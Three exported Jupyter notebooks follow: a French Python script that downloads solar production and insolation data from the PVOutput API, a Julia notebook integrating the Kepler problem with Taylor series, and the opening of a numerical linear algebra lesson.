# - A partir des logs, déterminer les dates pour lesquelles on a déjà les données
# - Etablir la nouvelle liste de dates pour lesquelles on doit requêter (nouvelles dates ou erreurs)
# - Boucle de requêtes
# - Charger le DF sur disque
# - Envois requête
# - Append des données reçues dans le DF
# - Exporter les résultat prk et csv)
# - Logs
# - Data
# LOGS :
# v2.2 Ajout de la gestion des dates déjà téléchargés
# TODO :
# - le rappel des date dl ne fonctionne pas comme il faut
# - la borne haute des dates à appelée n'est pas call (exclusif au lieu d'inclusif)
# - appliquer la refactoriser en fonctions au autres url
# - <<Attention ! pr les données aggrégées il va falloir reprendre des choses
# - convertir les types à la création des df
# - merge les dates et time en un TS ?
#
# - Gestion des limites d'API
# - "Rate limit information can be obtained by setting the HTTP header X-Rate-Limit to 1" https://pvoutput.org/help.html
# # Librairies et MeP
# +
# Librairie
#Divers
import requests #Call API
import time #Pr avoir dates avec today etc
import os #Pr création dossier etc
import pandas as pd
#Graphiques
# +
# Mise en forme du notebook
# Nb de ligne à afficher #Uniquement pr Jup Notbook ?
# pd.options.display.max_rows=100
# Largeur des cellules #Uniquement pr Jup Notbook ?
# from IPython.core.display import display, HTML
# display(HTML("<style>.container { width:80% !important; }</style>"))
# Mettre en output toutes les sortie d'une cellule
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all" #"last_expr"
# Avoir une forme de débugger
from IPython.core.debugger import Tracer # Plancer Tracer()() dans la fonction permet d'avoir un pas à pas, "n(ext) line and run this one, c(ontinue) running until next breakpoint, q(uit) the debugger"
# + [markdown] toc-hr-collapsed=true
# # Paramètres globaux
# +
# Paramètres génériques des requètes
notre_sys_id = '&sid=66192'
api_key = '&key=<KEY>'
target_sys_id = '&sid1=13412'
para_gene = notre_sys_id+api_key+target_sys_id
# -
# ## Bornes dates
# + active=""
# # Valeurs pr test (A INVERSER AVEC VALEURS PR PRODUCTION)
#
# wait = 1 #"300 requests per hour in donation mode." soit un await minimun de 12s
# date_recente = pd.to_datetime('20121115', format="%Y%m%d", errors='coerce')
# date_ancienne = pd.to_datetime('20121114', format="%Y%m%d", errors='coerce') # C'est la première date à partir de laquelle des données exploitables existent
# +
# Valeurs pr production
wait = 13 #"300 requests per hour in donation mode." soit un await minimun de 12s
date_recente = pd.to_datetime('today')
date_ancienne = pd.to_datetime('20121114', format="%Y%m%d", errors='coerce') # C'est la première date à partir de laquelle des données exploitables existent
# -
# # Définition des fonctions
# ## Test du call API
def TEST_CALL_API(url, date="20130101", colonnes=[]):
''' url, date(opt), colonnes(opt) --> df
url (url sans la date cible),
date (format texte, par défaut 20130101),
colonnes (liste de noms de colonnes)
'''
#Tracer()()
reponse_l = []
for ligne in requests.get(url+'&d='+date).text.split(';'):
reponse_l.append(ligne.split(','))
df = pd.DataFrame.from_records(reponse_l)
if len(colonnes) == df.shape[1]:
df.columns = colonnes
return df.head()
# ## Instanciation (potenciellement par chargement des données déjà DL)
def CHARGEMENT_DONNEES_DISQUE(path, file_name_core, logs_colonnes_l, data_colonnes_l):
'''(path, file_name_core) --> (log_df, data_df)
NB : si les fichiers ne sont pas trouvés, on instancie des df vierges, mais qui ne seront pas écris sur disque ici. Ce sera la fonction d'enregistrement, qui dans la même passe attribues des noms de colonnes
'''
# Dossier
if os.path.exists(path):
print("Dossier %s : trouvé" % path)
else:
os.makedirs(path)
print("Dossier %s : non trouvé" % path)
# Fichier de logs :
if os.path.isfile(path + file_name_core +"_log.pkl") and os.access(path + file_name_core + "_log.pkl", os.R_OK):
print("Fichier %s : trouvé et chargé " % (file_name_core +"_log.pkl"))
log_df = pd.read_pickle(path + file_name_core + "_log.pkl")
else:
print("Fichier %s : non trouvé, un nouveau est instancié" % (file_name_core +"_log.pkl"))
log_df = pd.DataFrame(columns= logs_colonnes_l)
# Fichier de données :
if os.path.isfile(path + file_name_core +"_data.pkl") and os.access(path + file_name_core + "_data.pkl", os.R_OK):
print("Fichier %s : trouvé et chargé " % (file_name_core +"_data.pkl"))
data_df = pd.read_pickle(path + file_name_core + "_data.pkl")
else:
print("Fichier %s : non trouvé, un nouveau est instancié" % (file_name_core +"_data.pkl"))
data_df = pd.DataFrame(columns = data_colonnes_l)
return (log_df, data_df)
# ## Création liste de dates à call
def FUNC_DATES_TO_CALL(log_df): #<<ATTENTION a adapter pr données de production aggrégées, dont la requête n'utilise pas la même forme de liste de date
'''log --> dates_requetes_l
'''
# Instanciation de la liste de date (en str) à paser argument de la requête :
dates_possibles_l = pd.date_range(start= date_ancienne, end= date_recente).strftime('%Y%m%d')
dates_deja_obtenues_l = list(log_df.loc[log_df['Réponse'] == 200, 'Date_cible'])
dates_requetes_l = [date for date in dates_possibles_l if date not in dates_deja_obtenues_l]
#print("dates_possibles_l", type(dates_possibles_l), dates_possibles_l)
#print("dates_deja_obtenues_l", type(dates_deja_obtenues_l), dates_deja_obtenues_l)
#print("dates_requetes_l", type(dates_requetes_l), dates_requetes_l)
# Calcul durée traitement (en heures)
print("Il y a déjà %d dates d'obtenues sur %d, soit encore %d dates a obtenir" % (len(dates_deja_obtenues_l), len(dates_possibles_l), len(dates_requetes_l)))
print("Traiter ce batch prendra %.2f heures" % ((len(dates_requetes_l)*wait)/(60*60)))
return dates_requetes_l
# ## Call API en batchs
def FUNC_CALL_API_JOUR(dates_requetes_l, wait, url, log_df, data_df):
'''(dates_requetes_l, wait, url, log_df, data_df) --> (log_df, data_df) complétés
'''
for date in dates_requetes_l :
#Limitateur débit
time.sleep(wait) #"300 requests per hour in donation mode." soit un await minimun de 12s
#Envois requête
requete = requests.get(url + '&d=' + date)
#Affichage live
print("Dates en cours: de ", date, "\t",requete.status_code)
#Log des calls
log_df = log_df.append(
dict(
zip(
log_df.columns,
[pd.to_datetime('today'), date, requete.status_code]
)
),
ignore_index=True
)
#Controleur validité réponse
if requete.status_code == 200:
for ligne in requete.text.split(';'):
#Append du df
data_df = data_df.append(
dict(
zip(
data_df,
(ligne.split(',') + [date]) # Petite trick due à la requête pr l'insolation, qui ne renvoit pas la date (==> on force la présence de la colonne et ici sa valeur)
)
),
ignore_index=True
)
return (log_df, data_df)
# ## Enregistrement sur disque
def FUNC_ENREGISTREMENT_DISQUE(path, file_name_core, log_df, data_df):
'''(path, file_name_core, log_df, data_df) --> Enregistrement de log_df et data_df en pkl et csv dans le dossier spécifié
'''
# Logs
log_df.to_pickle(path + file_name_core + "_log.pkl")
log_df.to_csv(path + file_name_core + "_log.csv", index= False)
# Df
data_df.to_pickle(path + file_name_core + "_data.pkl")
data_df.to_csv(path + file_name_core + "_data.csv", index= False)
print("Fichiers enregistrés")
# ## Check du df
def CHECK_DF(df):
'''df --> Nb de lignes, nb de lignes en double, df.info() et df.head(15)
'''
print("nb de ligne : ", len(df))
print("nb de ligne en doublons : ", df.duplicated().sum(), "\n")
df.info()
return df.head(15)
# ## Set de valeur pour débugage
# + active=""
# #Jeu de variable pr le débugage
#
# path = detail_INSOLATION_path
# file_name_core = detail_INSOLATION_file_name_core
# logs_colonnes_l = detail_INSOLATION_logs_colonnes_l
# data_colonnes_l = detail_INSOLATION_data_colonnes_l
# url = detail_INSOLATION_url
# + active=""
# # Test du call à l'API pour cette url
#
# TEST_CALL_API(url, colonnes = data_colonnes_l)
# + active=""
# # Chargement des données
#
# (log_df, data_df) = CHARGEMENT_DONNEES_DISQUE(path, file_name_core, logs_colonnes_l, data_colonnes_l)
# + active=""
# # Liste des dates à call
#
# dates_requetes_l = FUNC_DATES_TO_CALL(log_df)
# + active=""
# # Call API
#
# (log_df, data_df) = FUNC_CALL_API_JOUR(dates_requetes_l, wait, url, log_df, data_df)
# + active=""
# # Enregistrement sur disque
#
# FUNC_ENREGISTREMENT_DISQUE(path, file_name_core, log_df, data_df)
# + active=""
# # Check des données
#
# CHECK_DF(data_df)
# -
# # Détail_PRODUCTION
#
# Détail de la production d'un jour (getstatus).
# Résolution temporelle de 10min.
# +
# Paramètres pour "Détails Production"
# Divers
detail_PRODUCTION_path = "./DETAIL_PRODUCTION/" #Attention à ce fichu / en fin de path ;)
detail_PRODUCTION_file_name_core = "detail_PRODUCTION"
detail_PRODUCTION_logs_colonnes_l = ["TS_Call", "Date_cible", "Réponse"]
detail_PRODUCTION_data_colonnes_l = ["Date", "Time", "Energy_Generation", "Energy_Efficiency", "Instantaneous_Power", "Average_Power", "Normalised_Output", "Energy_Consumption", "Power_Consumption", "Temperature", "Voltage"] #/ The parameter sid1 is able to retrieve generation data from any system. Consumption data is not returned. The requesting system must have donation mode enabled.
# URL
detail = '&h=1' #The history parameter returns the entire status for a given date.
nb_max = '&limit=288' #Besoin de fixer à la valeur max de 288
ordre = '&asc=1'
detail_PRODUCTION_url = 'https://pvoutput.org/service/r2/getstatus.jsp?'+detail+nb_max+ordre+para_gene
# -
# Test
reponse = requests.get(detail_PRODUCTION_url+'&d='+"20121114")
reponse.status_code
reponse.text.split(';')
# Traitement du batch
# +
# Test du call à l'API pour cette url
TEST_CALL_API(
detail_PRODUCTION_url,
colonnes = detail_PRODUCTION_data_colonnes_l)
# Chargement / Instanciation des df :
(detail_PRODUCTION_log_df, detail_PRODUCTION_data_df) = CHARGEMENT_DONNEES_DISQUE(
detail_PRODUCTION_path,
detail_PRODUCTION_file_name_core,
detail_PRODUCTION_logs_colonnes_l,
detail_PRODUCTION_data_colonnes_l
)
# Instanciation de la liste des dates manquantes :
detail_PRODUCTION_dates_requetes_l = FUNC_DATES_TO_CALL(
detail_PRODUCTION_log_df)
# Call de l'API pr les dates manquantes :
(detail_PRODUCTION_log_df, detail_PRODUCTION_data_df) = FUNC_CALL_API_JOUR(
detail_PRODUCTION_dates_requetes_l,
wait,
detail_PRODUCTION_url,
detail_PRODUCTION_log_df,
detail_PRODUCTION_data_df)
# Enregistrement sur disque :
FUNC_ENREGISTREMENT_DISQUE(
detail_PRODUCTION_path,
detail_PRODUCTION_file_name_core,
detail_PRODUCTION_log_df,
detail_PRODUCTION_data_df)
# Check du dataset dispo :
CHECK_DF(detail_PRODUCTION_data_df)
# + [markdown] toc-hr-collapsed=true
# # Détail_INSOLATION
#
# Détail de l'insolation d'un jour (getinsolation).
# Résolution temporelle de 5min.
# +
# Paramètres pour "Détails Insolation"
# Divers
detail_INSOLATION_path = "./DETAIL_INSOLATION/" #Attention à ce fichu / en fin de path ;)
detail_INSOLATION_file_name_core = "detail_INSOLATION"
detail_INSOLATION_logs_colonnes_l = ["TS_Call", "Date_cible", "Réponse"]
detail_INSOLATION_data_colonnes_l = ["Time", "Power", "Energy", "Date"] #Il faut injecter manuellement la date, comme le call ne peut porter que sur une journée cible, c'est omis ds la réponse !
# URL
#Pas de paramètres interessants
detail_INSOLATION_url = 'https://pvoutput.org/service/r2/getinsolation.jsp?'+para_gene
# +
# Test du call à l'API pour cette url
TEST_CALL_API(
detail_INSOLATION_url,
colonnes = detail_INSOLATION_data_colonnes_l)
# Chargement / Instanciation des df :
(detail_INSOLATION_log_df, detail_INSOLATION_data_df) = CHARGEMENT_DONNEES_DISQUE(
detail_INSOLATION_path,
detail_INSOLATION_file_name_core,
detail_INSOLATION_logs_colonnes_l,
detail_INSOLATION_data_colonnes_l)
# Instanciation de la liste des dates manquantes :
detail_INSOLATION_dates_requetes_l = FUNC_DATES_TO_CALL(
detail_INSOLATION_log_df)
# Call de l'API pr les dates manquantes :
(detail_INSOLATION_log_df, detail_INSOLATION_data_df) = FUNC_CALL_API_JOUR(
detail_INSOLATION_dates_requetes_l,
wait,
detail_INSOLATION_url,
detail_INSOLATION_log_df,
detail_INSOLATION_data_df)
# Enregistrement sur disque :
FUNC_ENREGISTREMENT_DISQUE(
detail_INSOLATION_path,
detail_INSOLATION_file_name_core,
detail_INSOLATION_log_df,
detail_INSOLATION_data_df)
# Check du dataset dispo :
CHECK_DF(
detail_INSOLATION_data_df)
# + [markdown] toc-hr-collapsed=false
# # Aggrég_PRODUCTION
#
# Set de valeurs aggrégées de la production sur une journée (getoutput).
# Résolution temporelle de 1j.
# -
# Todo :
# - Charger valeurs fichiers (pas réellement besoin, mais pr faire propre)
# - Mettre aux propres les arguments des fonctions (celles de débug actuellement présentes)
# +
# Paramètres pour "Détails Insolation"
# Divers
aggreg_PRODUCTION_path = "./AGGREGATION_PRODUCTION/" #Attention à ce fichu / en fin de path ;)
aggreg_PRODUCTION_file_name_core = "aggreg_PRODUCTION"
aggreg_PRODUCTION_logs_colonnes_l = ["TS_Call", "Date_Début_Période", "Date_Fin_Période", "Nb_j", "Réponse"]
aggreg_PRODUCTION_data_colonnes_l = ["Date", "Energy_Generated", "Efficiency", "Energy_Exported", "Energy_Used", "Peak_Power", "Peak_Time", "Condition", "Min_Temperature", "Max_Temperature", "Peak_Energy_Import", "Off-Peak_Energy_Import", "Shoulder_Energy_Import", "High-Shoulder_Energy_Import", "Insolation"]
# URL
insolation = '&insolation=1'
nb_max = '&limit=150' #C'est une limite de l'API pr ce call
aggreg_PRODUCTION_url = 'https://pvoutput.org/service/r2/getoutput.jsp?'+insolation+nb_max+para_gene
# +
dates_l = list(pd.date_range(start= date_ancienne, end= pd.to_datetime('today'), freq='1D').strftime('%Y%m%d'))
print("nb jours sur l'interval entier", len(dates_l))
print("nb de batch (de 150j) à envoyer", len(dates_l) / 150)
#ID_interval = 0
#
#for i in range(0, len(dates_l), 151):
# print("Soit l'intervale : ", ID_interval)
# ID_interval += 1
#
# if (i+150) < len(dates_l):
# print("début : " + str(dates_l[i]) + " fin : " + str(dates_l[i+150]) + " soit 150j")
# else:
# print("début : " + str(dates_l[i]) + " fin : " + str(dates_l[-1]) + " soit " + str(len(dates_l)-1-i) + "j")
# +
log_df = pd.DataFrame(columns= aggreg_PRODUCTION_logs_colonnes_l)
data_df = pd.DataFrame(columns= aggreg_PRODUCTION_data_colonnes_l)
# Call API
for i in range(0, len(dates_l), 151):
#Limitateur débit
time.sleep(wait) #"300 requests per hour in donation mode." soit un await minimun de 12s
# Routage pour dernière période
if (i+150) <= len(dates_l):
fin = dates_l[i+150]
nb_j = 150
if (i+150) > len(dates_l):
fin = dates_l[-1]
nb_j = len(dates_l)-i
#<<Ajouter un catch d'erreur?
#Envois requête
requete = requests.get(url + '&df=' + dates_l[i] + '&dt=' + fin) #Il semble que j'avais "d" au lieux de "df", erreur ou contournement ?
#Affichage live
print("De {} à {} soit {} j, statut {} ".format(dates_l[i], fin, nb_j, requete.status_code))
#Log des calls
log_df = log_df.append(
dict(
zip(
log_df.columns, #["TS_Call", "Date_Début_Période", "Date_Fin_Période", "Nb_j", "Réponse"]
[pd.to_datetime('today'), dates_l[i], fin, nb_j, requete.status_code]
)
),
ignore_index=True
)
for ligne in requete.text.split(';'):
#Append du df
data_df = data_df.append(
dict(
zip(
data_df,
ligne.split(',')
)
),
ignore_index=True
)
data_df.sort_values(by='Date', inplace= True)
# +
# Enregistrement sur disque
FUNC_ENREGISTREMENT_DISQUE(path, file_name_core, log_df, data_df)
# +
# Check des données
CHECK_DF(data_df)
# + [markdown] toc-hr-collapsed=true
# # Info installation photovoiltaique
# +
# url info instalation
detail = '&ext=1'
sec_ar = '&array2=1'
info_instalation_url = 'https://pvoutput.org/service/r2/getsystem.jsp?'+detail+sec_ar+para_gene
# +
#Test requete instalation
requests.get(info_instalation_url).text
# -
|
DATA_COLLECTOR/COLLECTEUR_v2.3.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 0.4.8-pre
# language: julia
# name: julia-0.4
# ---
# # Integration of the Kepler problem with Taylor's method in `Julia`
#
# #### <NAME>, Instituto de Ciencias Físicas, UNAM
# benet < AT > fis.unam.mx
# ## I. The Taylor Integrator
#
# -------
# Taylor's integration method for ODEs is quite powerful, allowing to reach a precision comparable to round-off errors in one time-step. While the equations of motion can be in general easily implemented, an efficient implementation requires additional work. Below, we shall show two distinct implementations of the equations of motion for the Kepler problem, which shows how to optimize the running-time; see [TaylorIntegration.jl](https://github.com/PerezHz/TaylorIntegration.jl) for a yet non-optimized implementation.
# **NOTE**
#
# Below we use `julia` version 0.4.7 (0.4.8-pre+1) as the kernel, though it works using Julia v0.5.
# +
println(VERSION)
using Compat
# -
# We load first the relevant package: [TaylorSeries.jl][1]
#
# [1]: http://github.com/lbenet/TaylorSeries.jl
using TaylorSeries
# The following *parameters* are set for the integrator:
#
# - `ordenTaylor`: Order of the Taylor polynomials considered
# - `epsAbs`: Absolute value set for the last (*and* the one-before-last) term of the Taylor expansion of the dynamical variables. This value is used to define an integration step and represents a measure of the error. Notice below that this value is smaller than `eps(1.0)`.
# +
# Parámetros para el integrador de Taylor
const _ordenTaylor = 28
const _epsAbs = 1.0e-20
println(" Taylor order = $_ordenTaylor\n Eps = $_epsAbs\n")
# -
# The Taylor method works as follows: The equations of motion and the initial conditions $x(t_0)$, $y(t_0)$, $v_x(t_0)$, $v_y(t_0)$, are used to obtain *recursively* each term of the Taylor expansion of the dynamical variables, exploiting the relation
# $$
# x_{[n+1]} = \frac{f_{[n]}(x,t)}{n+1}.
# $$
# Here, $f_{[n]}(x,t)$ is the $n$-th (normalized) Taylor coefficient of $f(x,t)$ in terms of the independent variable $t$, where $f(x,t)$ is the rhs of the equation of motion $\dot{x} = f(x,t)$. Likewise, $x_{[n]}$ is the $n$-th Taylor coefficient for the dependent variable $x(t)$, expanded around $x(t_0)=x_{[0]}$. The latter corresponds to the initial condition.
#
# Once all Taylor coefficients are obtained up to a maximum order of the Taylor expansion, which is large enough to ensure convergece of the series, the last two terms of the expansion are used to determine the step size $h$ for the integration together with the value of `EpsAbs`. (Other methods exist that yield better optimized step-sizes, but these are usually more involved to compute.) Evaluating the Taylor expansion with the step-size yields the actual values of the dynamical variables at $t_1=t_0+h$. These values are then used as new *initial conditions* (at $t_0+h$) and everything is iterated.
#
# Except for the actual implementation of the equations of motion (the *jet*) discussed below, the following functions do what we just described:
#
# - `taylorStepper`: carries one step of the integration from $t_0$ to $t_1=t_0+h$, returning h and the value of the dynamical variables evaluated at $t_1$. This routine depends on a user-suplied routine that performs the computation of the Taylor coefficients of all dynamical variables, i.e., that implements the calculation of the jet (`jetEqs`). This routine has as input value a vector with the dynamical variables.
# - `stepsize`: Returns the integration step ($h$) from the Taylor expansion coefficients of *one* dynamical variable and `epsAbs`, as given by
# $ h = \min[\, (\epsilon/x^{[p-1]})^{1/(p-1)}, (\epsilon/x^{[p]})^{1/p}\, ], $
# where $p$ is the order of the Taylor polynomial, $x^{[r]}$ is the $r$-order Taylor coefficient (the $r$-th derivative divided by $r!$), and $\epsilon={\tt epsAbs}$.
#
# Returns stepsize of the integration and a vector with the updated values of the dependent
# variables
function taylorStepper{T<:Real}( jetEqs::Function, vec0::Array{T,1} )
n = length( vec0 )
vec0T = Array(Taylor1{T},n)
@simd for i in eachindex(vec0)
@inbounds vec0T[i] = Taylor1([vec0[i]], _ordenTaylor)
end
# Jets
vec1T = jetEqs( vec0 )
# Step-size
hh = Inf
for i in eachindex(vec1T)
@inbounds h1 = stepsize( vec1T[i], _epsAbs )
hh = min( hh, h1 )
end
# Values at t0+h
@simd for i in eachindex(vec0)
@inbounds vec0[i] = evaluate( vec1T[i], hh )
end
return hh, vec0
end
# Returns the maximum step size from epsilon and the last two coefficients of the x-Taylor series
function stepsize{T<:Real}(x::Taylor1{T}, epsilon::Float64)
ord = x.order
h = Inf
for k in [ord-1, ord]
kinv = 1.0/k
aux = abs( x[k+1] )
h = min(h, (epsilon/aux)^kinv)
end
return h
end
# ## II. The Kepler problem
#
# -------
# As a concrete example, we numerically integrate the cartesian equations of motion of the (planar) [Kepler problem](https://en.wikipedia.org/wiki/Kepler_problem):
#
# \begin{eqnarray}
# \dot{x} &=& v_x,\\
# \dot{y} &=& v_y,\\
# \dot{v}_x &=& - \frac{G M x}{(x^2 + y^2)^{3/2}},\\
# \dot{v}_y &=& - \frac{G M y}{(x^2 + y^2)^{3/2}}.
# \end{eqnarray}
# For concreteness, we fix $\mu = GM = 1$, and Kepler's third law defines the units of time in terms of those of distance: $T= 2\pi a^{3/2}$. The origin is the center of mass of the two bodies, so $x$ and $y$ above are actually relative coordinates to the center of mass. We choose the $x$-axis to be parallel to the major axis of the ellipse.
#
# The initial conditions for the particle are set at periapse, which we locate on the positive x-axis. Using the semimajor axis $a$ and the eccentricity $e$, we have
# $$
# x_0 = a (1-e),\\
# y_0 = 0,\\
# v_{x_0} = 0,\\
# v_{y_0} = \frac{l_z}{x_0} = m \frac{\sqrt{\mu a (1-e^2)}}{x_0},
# $$
# where $l_z$ is the angular momentum. Below we set the mass $m$ equal to 1.
# +
const mu = GM = 1.0
const masa = 1.0
const semieje = 1.0
const excentricidad = 0.8
println(" mass = $masa\n a = $semieje\n e = $excentricidad\n")
# -
# The following functions allow us to calculate the energy and angular momentum using cartesian coordinates or the semimajor axis and excentricity of the orbit:
function energy{T<:Real}( x::T, y::T, vx::T, vy::T )
eneCin = 0.5*(vx*vx + vy*vy)
r = sqrt( x*x + y*y)
enePot = -GM*masa/r
return eneCin + enePot
end
energy{T<:Real}(a::T) = - 0.5*GM*masa/a
lz{T<:Real}( a::T, e::T ) = masa * sqrt( GM*a*(1-e^2) )
lz1{T<:Real}( x::T, y::T, vx::T, vy::T ) = masa*( x*vy - y*vx )
# As mentioned above, we set the initial conditions in cartesian coordinates from the values of the semimajor axis and eccentricity.
function iniCond{T<:Real}(a::T, e::T)
x0 = a*(1-e)
vy0 = lz(a, e) / x0
y0 = zero(vy0)
vx0 = zero(vy0)
return x0, y0, vx0, vy0
end
# ## III. Taylor integration of the Kepler problem
#
# -------
# As mentioned above, Taylor's integration method is quite powerful. Yet, the equations of motion have to be implemented individually, and this involves a bit more than simply defining a function which contains the equations of motion, although the latter can actually be implemented just like that, which is paid back in performance.
#
# Below, the functions `jetKepler1` and `jetKepler2` are two implementations of the equations of motion for the Kepler problem. Both return a vector that contains the Taylor series for the dynamical variables, taking as input a vector of Taylor coefficients.
#
# The former function is an *almost* straight forward implementation of the equations of motion, except for the fact that we have to use `Taylor`-type variables. The latter yields the same results, but the implementation is done by splitting the equations of motion in unary and binary (elementary) functions and operations. This second method is quite *hand-crafted* to the actual problem, and it is not the most explicit way of doing this; yet, it turns out to be much more efficient than the former.
function jetKepler1{T<:Real}( vec::Array{T,1} )
xT = Taylor1(vec[1], _ordenTaylor)
yT = Taylor1(vec[2], _ordenTaylor)
vxT = Taylor1(vec[3], _ordenTaylor)
vyT = Taylor1(vec[4], _ordenTaylor)
for k = 0:_ordenTaylor-1
knext = k+1
# Taylor expansions up to order k
# This part makes it somewhat slower the implementations, since there
# are many operations which are completly superflous
xTt = Taylor1( xT[1:k+1], k)
yTt = Taylor1( yT[1:k+1], k)
vxTt = Taylor1( vxT[1:k+1], k)
vyTt = Taylor1( vyT[1:k+1], k)
# Eqs of motion <--- This as straight forward as it can be
xDot = vxTt
yDot = vyTt
rrt = ( xTt^2 + yTt^2 )^(3/2)
vxDot = -GM * xTt / rrt
vyDot = -GM * yTt / rrt
# The equations of motion define the recurrencies
xT[knext+1] = xDot[knext] / knext
yT[knext+1] = yDot[knext] / knext
vxT[knext+1] = vxDot[knext] / knext
vyT[knext+1] = vyDot[knext] / knext
end
return Taylor1[ xT, yT, vxT, vyT ]
end
function jetKepler2{T<:Real}( vec::Array{T,1} )
xT = Taylor1(vec[1], _ordenTaylor)
yT = Taylor1(vec[2], _ordenTaylor)
vxT = Taylor1(vec[3], _ordenTaylor)
vyT = Taylor1(vec[4], _ordenTaylor)
# Auxiliary quantities
x2T = zeros( T, _ordenTaylor+1 )
y2T = zeros( T, _ordenTaylor+1 )
sT = zeros( T, _ordenTaylor+1 )
rT3 = zeros( T, _ordenTaylor+1 )
Fx = zeros( T, _ordenTaylor+1 )
Fy = zeros( T, _ordenTaylor+1 )
# Now the implementation
for k = 0:_ordenTaylor-1
knext = k+1
# The right-hand size of the eqs of motion
# This is more adpated for this problem, and avoids many superflous operations
x2T[knext] = TaylorSeries.squareHomogCoef(k, xT.coeffs)
y2T[knext] = TaylorSeries.squareHomogCoef(k, yT.coeffs)
sT[knext] = x2T[knext] + y2T[knext]
rT3[knext] = TaylorSeries.powHomogCoef(k, sT, 1.5, rT3, 0)
Fx[knext] = TaylorSeries.divHomogCoef(k, xT.coeffs, rT3, Fx, 0)
Fy[knext] = TaylorSeries.divHomogCoef(k, yT.coeffs, rT3, Fy, 0)
# The equations of motion define the recurrencies
xT[knext+1] = vxT[knext] / knext
yT[knext+1] = vyT[knext] / knext
vxT[knext+1] = -GM * Fx[knext] / knext
vyT[knext+1] = -GM * Fy[knext] / knext
end
return Taylor1[ xT, yT, vxT, vyT ]
end
# The following shows some benchmarks for 10 identic one-step integrations, using both implementations of the equations of motion.
# +
x0, y0, vx0, vy0 = iniCond(semieje, excentricidad)
taylorStepper( jetKepler1, [x0, y0, vx0, vy0] );
timeJK1 = @elapsed begin
for i=1:10
taylorStepper( jetKepler1, [x0, y0, vx0, vy0] );
end
end
taylorStepper( jetKepler1, [x0, y0, vx0, vy0] )
# +
x0, y0, vx0, vy0 = iniCond(semieje, excentricidad)
taylorStepper( jetKepler2, [x0, y0, vx0, vy0] );
timeJK2 = @elapsed begin
for i=1:10
taylorStepper( jetKepler2, [x0, y0, vx0, vy0] );
end
end
taylorStepper( jetKepler2, [x0, y0, vx0, vy0] )
# -
println( "timeJK1 = $(timeJK1) timeJK2 = $(timeJK2) ")
tau = timeJK1/timeJK2
# The results are identic, as it should be; yet, the elapsed time is somewhat shorter when using `jetKepler2`. The numbers clearly show that it is worth taking the time to construct the jet as in `jetKepler2`.
# Now, we carry out a long integration of this rather eccentric keplerian orbit (excentricity is 0.8). Everything needed is included in the function `keplerIntegration`.
function keplerIntegration( a::Float64, e::Float64, time_max::Float64, jetEqs::Function )
# Initial conditions, energy and angular momentum
t0 = 0.0
x0, y0, vx0, vy0 = iniCond(a, e)
ene0 = energy(x0, y0, vx0, vy0)
lz0 = lz1(x0, y0, vx0, vy0)
# Change, measured in the local `eps` of the change of energy and angular momentum
eps_ene = eps(ene0); dEne = zero(Int)
eps_lz = eps(lz0); dLz = zero(Int)
# Vectors to plot the orbit with PyPlot
tV, xV, yV, vxV, vyV = Float64[], Float64[], Float64[], Float64[], Float64[]
DeneV, DlzV = Int[], Int[]
push!(tV, t0)
push!(xV, x0)
push!(yV, y0)
push!(vxV, vx0)
push!(vyV, vy0)
push!(DeneV, zero(Int))
push!(DlzV, zero(Int))
# This is the main loop; we include a minimum step size for security
dt = 1.0
while t0 < time_max && dt>1.0e-8
# Here we integrate
dt, (x1, y1, vx1, vy1) = taylorStepper( jetEqs, [x0, y0, vx0, vy0] );
t0 += dt
push!(tV,t0)
push!(xV,x1)
push!(yV,y1)
push!(vxV, vx1)
push!(vyV, vy1)
eneEnd = energy(x1, y1, vx1, vy1)
lzEnd = lz1(x1, y1, vx1, vy1)
dEne = trunc( Int, (eneEnd-ene0)/eps_ene )
dLz = trunc( Int, (lzEnd-lz0)/eps_lz )
push!(DeneV, dEne)
push!(DlzV, dLz)
x0, y0, vx0, vy0 = x1, y1, vx1, vy1
end
return tV, xV, yV, DeneV, DlzV
end
#jetKepler1
tV1, xV1, yV1, DeneV1, DlzV1 = keplerIntegration( semieje, excentricidad, 2pi, jetKepler1);
@time tV1, xV1, yV1, DeneV1, DlzV1 =
keplerIntegration( semieje, excentricidad, 1000*2pi, jetKepler1);
#jetKepler2
tV2, xV2, yV2, DeneV2, DlzV2 = keplerIntegration( semieje, excentricidad, 2pi, jetKepler2);
@time tV2, xV2, yV2, DeneV2, DlzV2 =
keplerIntegration( semieje, excentricidad, 1000*2pi, jetKepler2);
# Checking the consistency of the results after 1000 periods
tV1[end] == tV2[end], yV1[end] == yV2[end]
# The minimum value of the step-size:
minimum([tV1[i+1]-tV1[i] for i=1:length(tV1)-1])
# which, in units of the orbital period, is:
ans/(2pi)
# The average step-size is:
(tV1[end]-tV1[1])/(length(tV1)-1)
ans/(2pi)
# Now let us plot the trajectory using `PyPlot`:
using PyPlot
axis("equal")
plot(xV1, yV1, ",", [0], [0], "+")
# Here we also plot the absolute change of energy and angular momentum as a function of time, in units of the
# local `eps` values for the initial quantities.
plot(tV2/(2pi), DeneV2, ",", tV2/(2pi), DlzV2, ",")
tV2, xV2, yV2, DeneV2, DlzV2 =
keplerIntegration( semieje, excentricidad, 2pi*10000.0, jetKepler2);
plot(tV2/(2pi), DeneV2, ",", tV2/(2pi), DlzV2, ",")
maximum(abs(DeneV2)), maximum(abs(DlzV2))
maximum(abs(DeneV2))*eps(1.0), maximum(abs(DlzV2))*eps(1.0)
# The absolute change of this quantities, after 10000 periods, is for the energy $704\ {\rm eps}\sim 1.56\times 10^{-13}$, and for the angular momentum $176\ {\rm eps}\sim 3.9\times10^{-14}$. The changes in time of these queantities have a random walk like behaviour, pointing out that they are due to the round-off errors in the computations.
#
# The numerical precision attained is **really good**.
|
examples/1-KeplerProblem.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] slideshow={"slide_type": "skip"}
# <table>
# <tr align=left><td><img align=left src="./images/CC-BY.png">
# <td>Text provided under a Creative Commons Attribution license, CC-BY. All code is made available under the FSF-approved MIT license. (c) <NAME></td>
# </table>
#
# Note: This material largely follows the text "Numerical Linear Algebra" by Trefethen and Bau (SIAM, 1997) and is meant as a guide and supplement to the material presented there.
# + init_cell=true slideshow={"slide_type": "skip"}
from __future__ import print_function
# %matplotlib inline
import numpy
import matplotlib.pyplot as plt
